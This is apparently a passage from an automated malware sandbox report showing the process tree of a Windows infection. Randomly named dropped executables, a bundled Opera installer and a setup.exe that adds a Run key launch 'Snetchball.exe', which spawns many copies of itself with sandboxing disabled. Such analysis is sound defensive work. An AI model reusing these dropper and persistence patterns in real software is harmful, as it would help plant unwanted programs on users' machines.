                                                                                                            C:\Users\Admin\AppData\Local\Temp\2qWqGox4\izI45DYKHQrzx6FsZlYn.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.47 --initial-client-data=0x30c,0x310,0x314,0x2dc,0x318,0x7315d178,0x7315d188,0x7315d194
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:4364
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202307101508231\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202307101508231\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1104
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202307101508231\assistant\assistant_installer.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202307101508231\assistant\assistant_installer.exe" --version
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:4904
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202307101508231\assistant\assistant_installer.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202307101508231\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x288,0x28c,0x290,0x264,0x294,0x36e8a0,0x36e8b0,0x36e8bc
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:2948
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\mldnoUkQ\YIXMqLnyEjMv.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\mldnoUkQ\YIXMqLnyEjMv.exe
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2836
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-9VHTE.tmp\is-DR48I.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-9VHTE.tmp\is-DR48I.tmp" /SL4 $30374 "C:\Users\Admin\AppData\Local\Temp\mldnoUkQ\YIXMqLnyEjMv.exe" 987773 52736
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:3232
                                                                                                          • C:\Program Files (x86)\FQngBackup\SyncBackupShell.exe
                                                                                                            "C:\Program Files (x86)\FQngBackup\SyncBackupShell.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:1280
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4SwDpT4T\AlNbV2p.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\4SwDpT4T\AlNbV2p.exe /sid=3 /pid=449
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:2872
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Adds Run key to start application
                                                                                                          PID:3272
                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                            6⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Modifies Control Panel
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1452
                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2924,11820215124296507617,3570788744905853993,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3036 /prefetch:2
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:4228
                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2924,11820215124296507617,3570788744905853993,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3320 /prefetch:8
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Drops file in Windows directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:4488
                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2924,11820215124296507617,3570788744905853993,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:109.0) Gecko/115.0 Firefox/115.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
                                                                                                              7⤵
                                                                                                              • Checks computer location settings
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:5012
                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                8⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies Control Panel
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:3192
                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                  9⤵
                                                                                                                    PID:2100
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                      10⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2896
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                      10⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Modifies Control Panel
                                                                                                                      PID:1216
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                        11⤵
                                                                                                                          PID:2036
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                          11⤵
                                                                                                                            PID:5260
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                            11⤵
                                                                                                                            • Modifies Control Panel
                                                                                                                            PID:5784
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                            11⤵
                                                                                                                              PID:636
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                              11⤵
                                                                                                                                PID:3656
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                              10⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Modifies Control Panel
                                                                                                                              PID:1484
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                              10⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Modifies Control Panel
                                                                                                                              PID:2420
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                11⤵
                                                                                                                                  PID:4536
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                  11⤵
                                                                                                                                  • Modifies Control Panel
                                                                                                                                  PID:6312
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                  11⤵
                                                                                                                                    PID:6948
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                    11⤵
                                                                                                                                      PID:6516
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                    10⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4460
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                    10⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies Control Panel
                                                                                                                                    PID:3052
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                    10⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies Control Panel
                                                                                                                                    PID:932
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                    10⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies Control Panel
                                                                                                                                    PID:5212
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                      11⤵
                                                                                                                                        PID:6584
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                        11⤵
                                                                                                                                          PID:6956
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                          11⤵
                                                                                                                                            PID:4740
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                          10⤵
                                                                                                                                          • Modifies Control Panel
                                                                                                                                          PID:5520
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                          10⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Modifies Control Panel
                                                                                                                                          PID:5340
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                            11⤵
                                                                                                                                              PID:6916
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                              11⤵
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              PID:1196
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                            10⤵
                                                                                                                                              PID:5668
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                11⤵
                                                                                                                                                  PID:5124
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                  11⤵
                                                                                                                                                    PID:7844
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                  10⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  • Modifies Control Panel
                                                                                                                                                  PID:5964
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                  10⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  • Modifies Control Panel
                                                                                                                                                  PID:4976
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                  10⤵
                                                                                                                                                    PID:2476
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                    10⤵
                                                                                                                                                      PID:1412
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                      10⤵
                                                                                                                                                        PID:5180
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                        10⤵
                                                                                                                                                          PID:3548
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                          10⤵
                                                                                                                                                            PID:4284
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                            10⤵
                                                                                                                                                            • Modifies Control Panel
                                                                                                                                                            PID:1956
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                          9⤵
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Modifies Control Panel
                                                                                                                                                          PID:216
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                            10⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:556
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                            10⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Modifies Control Panel
                                                                                                                                                            PID:1812
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                              11⤵
                                                                                                                                                                PID:2776
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:5368
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:4312
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                    11⤵
                                                                                                                                                                    • Modifies Control Panel
                                                                                                                                                                    PID:1340
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                    11⤵
                                                                                                                                                                    • Modifies Control Panel
                                                                                                                                                                    PID:5244
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                    11⤵
                                                                                                                                                                    • Modifies Control Panel
                                                                                                                                                                    PID:6328
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:6940
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:5508
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:7860
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                        10⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Modifies Control Panel
                                                                                                                                                                        PID:2220
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:5444
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                            11⤵
                                                                                                                                                                            • Modifies Control Panel
                                                                                                                                                                            PID:5192
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:5144
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:5736
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Modifies Control Panel
                                                                                                                                                                                PID:2240
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Modifies Control Panel
                                                                                                                                                                                PID:6336
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:6932
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:4836
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                  10⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:952
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                  10⤵
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Modifies Control Panel
                                                                                                                                                                                  PID:4212
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Modifies Control Panel
                                                                                                                                                                                    PID:6192
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Modifies Control Panel
                                                                                                                                                                                    PID:6372
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:6668
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:7044
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:4440
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                        10⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:3320
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                        10⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:5232
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                        10⤵
                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Modifies Control Panel
                                                                                                                                                                                        PID:5356
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:7016
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:6380
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                            10⤵
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            • Modifies Control Panel
                                                                                                                                                                                            PID:5500
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:5480
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:7868
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:5656
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                  • Modifies Control Panel
                                                                                                                                                                                                  PID:5776
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                      PID:7724
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:6036
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:8
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
